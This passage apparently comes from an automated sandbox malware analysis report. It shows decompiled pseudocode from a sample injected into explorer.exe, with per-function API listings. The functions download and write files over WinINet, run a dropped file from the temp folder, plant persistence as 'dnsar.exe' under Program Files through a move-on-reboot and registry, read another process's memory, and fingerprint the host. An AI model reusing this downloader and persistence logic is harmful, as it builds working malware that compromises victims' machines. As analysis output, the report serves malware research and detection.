					E007C16D8(_v28,  &_v72, 0x1f,  &_v32);
					_v72 = _v72 | 0x00000100;
					E007C170C(_v28,  &_v72, 0x1f, 4);
				}
				E007C15E4(_v28, 0, 0, 0, 0);
				_v32 = 4;
				_v36 = 0;
				_v40 = 0;
				E007C39CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
				if(_v36 != 0xc8) {
					L24:
					E007C151C(_v28);
					E007C151C(_v24);
					E007C151C(_v20);
					return _v16;
				} else {
					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_v52 == 0xffffffff) {
						goto L24;
					} else {
						goto L21;
					}
					do {
						L21:
						_v44 = E007C16A4(_v28, 0,  &_v32, 0);
						E007C15B0(_v28, 0x401,  &_v1483,  &_v32);
						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
					} while (_v32 != 0 || _v44 == 0);
					CloseHandle(_v52);
					_v16 = 0xffffffff;
					goto L24;
				}
			}






























    0x007c3c31
    0x007c3c34
    0x007c3c39
    0x007c3c3c
    0x007c3c43
    0x007c3c45
    0x007c3c45
    0x007c3c4a
    0x007c3c53
    0x007c3c60
    0x007c3c62
    0x007c3c72
    0x007c3c79
    0x007c3c81
    0x007c3c91
    0x007c3c9a
    0x007c3ca9
    0x007c3cb1
    0x007c3cc2
    0x007c3cc2
    0x007c3cc7
    0x007c3ccc
    0x007c3ccc
    0x007c3ccf
    0x007c3cda
    0x007c3cd1
    0x007c3cd1
    0x007c3ce1
    0x007c3cd3
    0x007c3cd4
    0x007c3ce6
    0x007c3ce6
    0x007c3cd4
    0x007c3cd1
    0x007c3d01
    0x007c3d08
    0x007c3d13
    0x007c3d0a
    0x007c3d0a
    0x007c3d0a
    0x007c3d36
    0x007c3d3d
    0x007c3d48
    0x007c3d3f
    0x007c3d3f
    0x007c3d3f
    0x007c3d61
    0x007c3d6f
    0x007c3d76
    0x007c3d78
    0x007c3d8e
    0x007c3d93
    0x007c3da7
    0x007c3da7
    0x007c3db7
    0x007c3dbc
    0x007c3dc5
    0x007c3dca
    0x007c3de0
    0x007c3dec
    0x007c3e78
    0x007c3e7b
    0x007c3e83
    0x007c3e8b
    0x007c3e96
    0x007c3df2
    0x007c3e0e
    0x007c3e15
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x007c3e17
    0x007c3e17
    0x007c3e26
    0x007c3e3b
    0x007c3e55
    0x007c3e5b
    0x007c3e6b
    0x007c3e71
    0x00000000
    0x007c3e71

    APIs
      • Part of subcall function 007C3864: InternetOpenA.WININET(?,?,?,?,?), ref: 007C387C
      • Part of subcall function 007C161C: InternetConnectA.WININET(?,?,?,?,?,?,?,?), ref: 007C164D
      • Part of subcall function 007C1660: HttpOpenRequestA.WININET(?,?,?,?,?,?,?,?), ref: 007C168F
      • Part of subcall function 007C15E4: HttpSendRequestA.WININET(?,?,?,?,?), ref: 007C1607
      • Part of subcall function 007C39CC: HttpQueryInfoA.WININET(?,?,?,?,?), ref: 007C39EF
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C3E08
      • Part of subcall function 007C16A4: InternetQueryDataAvailable.WININET(?,?,?,?), ref: 007C16C3
      • Part of subcall function 007C15B0: InternetReadFile.WININET(?,?,?,?), ref: 007C15CF
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 007C3E55
    • CloseHandle.KERNEL32(000000FF), ref: 007C3E6B
      • Part of subcall function 007C151C: InternetCloseHandle.WININET(?), ref: 007C1529
      • Part of subcall function 007C16D8: InternetQueryOptionA.WININET(?,?,?,?), ref: 007C16F7
      • Part of subcall function 007C170C: InternetSetOptionA.WININET(?,?,?,?), ref: 007C172B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C76A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146
    C-Code - Quality: 93%
    			E007C76A0(int __eax, void* __ebx) {
				int _v8;
				char* _v12;
				char* _v16;
				char _v273;
				char _v530;
				void* __ebp;
				int _t38;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				void* _t111;
				void* _t112;
				void* _t113;

				_t38 = __eax;
				_v8 = __eax;
				if( *0x7cb514 > 0 &&  *0x7cb510 != 0) {
					E007C1308( &_v530, 0x7cb518);
					 *((char*)(_t111 + E007C12DC(0x7cb518) - 0x212)) = 0;
					E007C133C( &_v530, ".lnk");
					_t113 = _t112 + 8;
					_t96 =  &_v530;
					_t102 =  *0x7ca0ac; // 0x7c1c58
					_t46 = E007C3FC8(0x7cb518, __ebx,  &_v530, _t102);
					asm("sbb eax, eax");
					if( ~( ~_t46) == 0) {
						E007C1308( &_v530, 0x7c78ec);
						E007C133C( &_v530, "C:\Program Files\Windows NT\dnsar.exe");
						E007C133C( &_v530, 0x7c78f0);
						_t92 =  *0x7ca0ac; // 0x7c1c58
						E007C133C( &_v530, _t92);
						_t113 = _t113 + 0x18;
					}
					if( *0x7ca034 == 0) {
						_t50 = E007C4968(0x80000001, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t50);
						if(_t38 != 0 &&  *0x7cb514 > 0 &&  *0x7cb510 != 0) {
							_t97 =  *0x7cb514; // 0x28800
							_t104 =  *0x7cb510; // 0x490000
							E007C485C(0x7cb518, _t97, _t104);
							return E007C763C(0x7cb518);
						}
					} else {
						_t57 = E007C4968(0x80000002, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t57);
						if(_t38 != 0) {
							if(_v8 != 0) {
								_t100 =  *0x7cb514; // 0x28800
								_t109 =  *0x7cb510; // 0x490000
								E007C485C(0x7cb518, _t100, _t109);
								return E007C763C(0x7cb518);
							}
							E007C1308( &_v273, 0x7cb518);
							_v12 =  &_v273;
							_v16 = 0;
							while( *_v12 != 0) {
								if( *_v12 == 0x5c) {
									_v16 = _v12;
								}
								_v12 = _v12 + 1;
							}
							if(_v16 == 0) {
								_v16 =  &_v273;
							} else {
								_v16 = _v16 + 1;
							}
							 *_v16 = 0;
							_v12 = E007C3B80(9, 0x19, 0x14);
							E007C133C(_v16, _v12);
							E007C1440(_v12);
							E007C133C(_v16, ".txt");
							_t38 = MoveFileExA( &_v273, "C:\Program Files\Windows NT\dnsar.exe", 4);
							if( *0x7cb514 > 0 &&  *0x7cb510 != 0) {
								_t99 =  *0x7cb514; // 0x28800
								_t108 =  *0x7cb510; // 0x490000
								E007C485C( &_v273, _t99, _t108);
								return E007C763C( &_v273);
							}
						}
					}
				}
				return _t38;
			}
























    0x007c76a0
    0x007c76a9
    0x007c76b3
    0x007c76d1
    0x007c76e0
    0x007c76f4
    0x007c76f9
    0x007c76fc
    0x007c7707
    0x007c770d
    0x007c7714
    0x007c771a
    0x007c7727
    0x007c7738
    0x007c774c
    0x007c7754
    0x007c7761
    0x007c7766
    0x007c7766
    0x007c7770
    0x007c789e
    0x007c78a5
    0x007c78a7
    0x007c78ab
    0x007c78c4
    0x007c78ca
    0x007c78d0
    0x00000000
    0x007c78da
    0x007c7776
    0x007c7781
    0x007c7788
    0x007c778a
    0x007c778e
    0x007c7798
    0x007c779f
    0x007c77a5
    0x007c77ab
    0x00000000
    0x007c77b5
    0x007c77ca
    0x007c77d5
    0x007c77da
    0x007c77f0
    0x007c77e5
    0x007c77ea
    0x007c77ea
    0x007c77ed
    0x007c77ed
    0x007c77fc
    0x007c7809
    0x007c77fe
    0x007c77fe
    0x007c77fe
    0x007c780f
    0x007c781d
    0x007c7828
    0x007c7833
    0x007c7841
    0x007c7857
    0x007c7864
    0x007c7875
    0x007c787b
    0x007c7881
    0x00000000
    0x007c788c
    0x007c7864
    0x007c778e
    0x007c7770
    0x007c78e2

    APIs
      • Part of subcall function 007C3FC8: CoInitialize.OLE32(00000000), ref: 007C4001
      • Part of subcall function 007C3FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007C4089
      • Part of subcall function 007C3FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 007C40A7
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • MoveFileExA.KERNEL32(?,C:\Program Files\Windows NT\dnsar.exe,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 007C7857
      • Part of subcall function 007C4968: SHGetValueA.SHLWAPI(?,007C1DAC,?,00000001,00000000,?), ref: 007C49B1
      • Part of subcall function 007C4968: RegOpenKeyExA.ADVAPI32(?,007C1DAC,00000000,000F003F,?), ref: 007C49D0
      • Part of subcall function 007C485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
      • Part of subcall function 007C485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
      • Part of subcall function 007C485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
      • Part of subcall function 007C485C: CloseHandle.KERNEL32(000000FF), ref: 007C48CE
      • Part of subcall function 007C763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7658
      • Part of subcall function 007C763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 007C766D
      • Part of subcall function 007C763C: CloseHandle.KERNEL32(000000FF), ref: 007C768A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C92CD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
    C-Code - Quality: 35%
    			E007C92CD() {
				void* _t3;
				intOrPtr _t11;
				intOrPtr* _t18;
				intOrPtr* _t21;
				void* _t24;
				void* _t25;

				_t3 =  *_t21();
				_t28 = _t3;
				if(_t3 != 0) {
					 *_t18(0);
				}
				_pop(_t22);
				_pop(_t19);
				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
				 *0x7ca06c = E007C7C50(_t25 - 0x117 + 2);
				_t11 =  *0x7ca06c; // 0x5b392e46
				wsprintfA("1530474054", E007C9468, _t11);
				_push(GetCursorPos(0x7ca578));
				E007C69BC(_t24, _t28);
				goto __eax;
			}









    0x007c92cd
    0x007c92cf
    0x007c92d2
    0x007c92d6
    0x007c92d8
    0x007c92dc
    0x007c92dd
    0x007c92f0
    0x007c9304
    0x007c9309
    0x007c9319
    0x007c932d
    0x007c9330
    0x007c9345

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 007C92F0
      • Part of subcall function 007C7C50: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7C71
      • Part of subcall function 007C7C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C7C93
      • Part of subcall function 007C7C50: ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 007C7CB2
      • Part of subcall function 007C7C50: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 007C7CC7
      • Part of subcall function 007C7C50: ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 007C7CDD
      • Part of subcall function 007C7C50: CloseHandle.KERNEL32(000000FF), ref: 007C7CE7
    • wsprintfA.USER32 ref: 007C9319
    • GetCursorPos.USER32(007CA578), ref: 007C9327
      • Part of subcall function 007C69BC: GetTempPathA.KERNEL32(00000101,?), ref: 007C69E1
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4EF0, Relevance: 6.1, APIs: 4, Instructions: 112
    C-Code - Quality: 82%
    			E007C4EF0(void* __eax, void* __eflags) {
				void* _v8;
				void _v12;
				void* _v16;
				void _v20;
				void _v24;
				void* _v28;
				void* _v32;
				long _v36;
				intOrPtr* _v40;
				void* _v52;
				void _v64;
				signed int _t63;
				signed int _t72;
				signed int _t88;
				signed int _t96;

				_v8 = __eax;
				_v24 = 0;
				_v12 = 0;
				_v28 = E007C13DC(0x1000);
				_v32 = E007C4E94(_v8);
				if(_v32 != 0) {
					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36);
					asm("sbb eax, eax");
					if( ~( ~_t63) != 0) {
						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36);
						asm("sbb eax, eax");
						if( ~( ~_t72) != 0) {
							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
							_v40 = _v28 + 0xc0;
							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
								asm("sbb eax, eax");
								if( ~( ~_t88) != 0) {
									_v16 = _v52;
									if(_v16 != 0) {
										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
										asm("sbb eax, eax");
										if( ~( ~_t96) != 0) {
											_v20 =  *_v28;
											if(_v20 != 0) {
												_v24 = _v20;
											}
										}
									}
								}
							}
						}
					}
				}
				E007C1440(_v28);
				_v12 = _v24;
				return _v12;
			}


















    0x007c4ef6
    0x007c4efb
    0x007c4f00
    0x007c4f0d
    0x007c4f18
    0x007c4f1f
    0x007c4f3a
    0x007c4f42
    0x007c4f48
    0x007c4f69
    0x007c4f71
    0x007c4f77
    0x007c4f86
    0x007c4f91
    0x007c4f9a
    0x007c4fbc
    0x007c4fc4
    0x007c4fca
    0x007c4fcf
    0x007c4fd6
    0x007c4fed
    0x007c4ff5
    0x007c4ffb
    0x007c5002
    0x007c5009
    0x007c500e
    0x007c500e
    0x007c5009
    0x007c4ffb
    0x007c4fd6
    0x007c4fca
    0x007c4f9a
    0x007c4f77
    0x007c4f48
    0x007c5014
    0x007c501c
    0x007c5025

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
      • Part of subcall function 007C4E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 007C4EAD
      • Part of subcall function 007C4E94: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4EDD
    • ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F3A
    • ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F69
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 007C4FBC
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 007C4FED
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C485C, Relevance: 6.0, APIs: 4, Instructions: 46file
    C-Code - Quality: 100%
    			E007C485C(CHAR* __eax, long __ecx, void* __edx) {
				CHAR* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_v24 != 0xffffffff) {
					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) {
						_v20 = 0xffffffff;
					}
					FlushFileBuffers(_v24);
					CloseHandle(_v24);
				}
				return _v20;
			}









    0x007c4862
    0x007c4865
    0x007c4868
    0x007c486d
    0x007c488c
    0x007c4893
    0x007c48af
    0x007c48b9
    0x007c48b9
    0x007c48c4
    0x007c48ce
    0x007c48ce
    0x007c48da

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
    • FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
    • CloseHandle.KERNEL32(000000FF), ref: 007C48CE
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7D3C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
    C-Code - Quality: 100%
    			E007C7D3C(void* __eax, void* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v85;
				char _v342;
				void* _t34;
				intOrPtr _t42;
				void* _t55;
				intOrPtr _t58;

				_t55 = __ecx;
				_v8 = __eax;
				_v342 = 0;
				GetTempPathA(0x101,  &_v342);
				_v12 = _v8;
				_v16 = 0;
				while(1) {
					_t34 = _v12;
					if( *_t34 == 0) {
						break;
					}
					__eflags =  *_v12 - 0x2f;
					if( *_v12 == 0x2f) {
						_v16 = _v12;
					}
					_t10 =  &_v12;
					 *_t10 = _v12 + 1;
					__eflags =  *_t10;
				}
				if(_v16 != 0) {
					_v16 = _v16 + 1;
					E007C133C( &_v342, _v16);
					if(E007C3C28(_v8, _t55,  &_v342) == 0) {
						_t42 =  *0x7ca170; // 0x7c1e04
						return E007C7240(_t42, __eflags);
					}
					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5);
					_v20 = _t34;
					_t66 = _v20 - 0x20;
					if(_v20 <= 0x20) {
						E007C1864(_v20,  &_v85);
						_t58 =  *0x7ca16c; // 0x7c1df8
						E007C1308( &_v342, _t58);
						E007C133C( &_v342,  &_v85);
						return E007C7240( &_v342, _t66);
					}
				}
				return _t34;
			}













    0x007c7d3c
    0x007c7d45
    0x007c7d48
    0x007c7d5b
    0x007c7d64
    0x007c7d69
    0x007c7d7f
    0x007c7d7f
    0x007c7d85
    0x00000000
    0x00000000
    0x007c7d71
    0x007c7d74
    0x007c7d79
    0x007c7d79
    0x007c7d7c
    0x007c7d7c
    0x007c7d7c
    0x007c7d7c
    0x007c7d8b
    0x007c7d91
    0x007c7d9f
    0x007c7db7
    0x007c7e1a
    0x00000000
    0x007c7e1f
    0x007c7dca
    0x007c7dd0
    0x007c7dd3
    0x007c7dd7
    0x007c7de1
    0x007c7def
    0x007c7df5
    0x007c7e05
    0x00000000
    0x007c7e13
    0x007c7dd7
    0x007c7e27

    APIs
    • GetTempPathA.KERNEL32(00000101,00000000), ref: 007C7D5B
      • Part of subcall function 007C3C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C3E08
      • Part of subcall function 007C3C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 007C3E55
      • Part of subcall function 007C3C28: CloseHandle.KERNEL32(000000FF), ref: 007C3E6B
    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 007C7DCA
      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C6900, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58registry
    C-Code - Quality: 92%
    			E007C6900(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v117;
				char _v153;
				char* _t30;
				intOrPtr _t35;

				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v153),  &_v153);
				}
				_t30 =  *0x7ca25c; // 0x7c2174
				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24);
				_v12 = 4;
				_v20 = 0;
				_t35 =  *0x7ca0f0; // 0x7c1d3c
				E007C38B0(_v24, _t35, 0, 0,  &_v20,  &_v12);
				E007C3890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E007C1164(_v16, _v8);
			}












    0x007c6900
    0x007c6901
    0x007c6903
    0x007c690d
    0x007c6912
    0x007c6915
    0x007c692f
    0x007c694c
    0x007c694c
    0x007c695a
    0x007c6965
    0x007c696b
    0x007c6974
    0x007c6983
    0x007c698d
    0x007c6998
    0x007c69a8
    0x007c69b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 007C6927
    • RegOpenKeyExA.ADVAPI32(80000002,007C2174,00000000,00020119,?), ref: 007C6965
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C6904, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registry
    C-Code - Quality: 100%
    			E007C6904(intOrPtr __eax) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				char* _t28;
				intOrPtr _t33;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v153),  &_v153);
				}
				_t28 =  *0x7ca25c; // 0x7c2174
				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24);
				_v12 = 4;
				_v20 = 0;
				_t33 =  *0x7ca0f0; // 0x7c1d3c
				E007C38B0(_v24, _t33, 0, 0,  &_v20,  &_v12);
				E007C3890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E007C1164(_v16, _v8);
			}











    0x007c690d
    0x007c6912
    0x007c6915
    0x007c692f
    0x007c694c
    0x007c694c
    0x007c695a
    0x007c6965
    0x007c696b
    0x007c6974
    0x007c6983
    0x007c698d
    0x007c6998
    0x007c69a8
    0x007c69b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 007C6927
    • RegOpenKeyExA.ADVAPI32(80000002,007C2174,00000000,00020119,?), ref: 007C6965
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches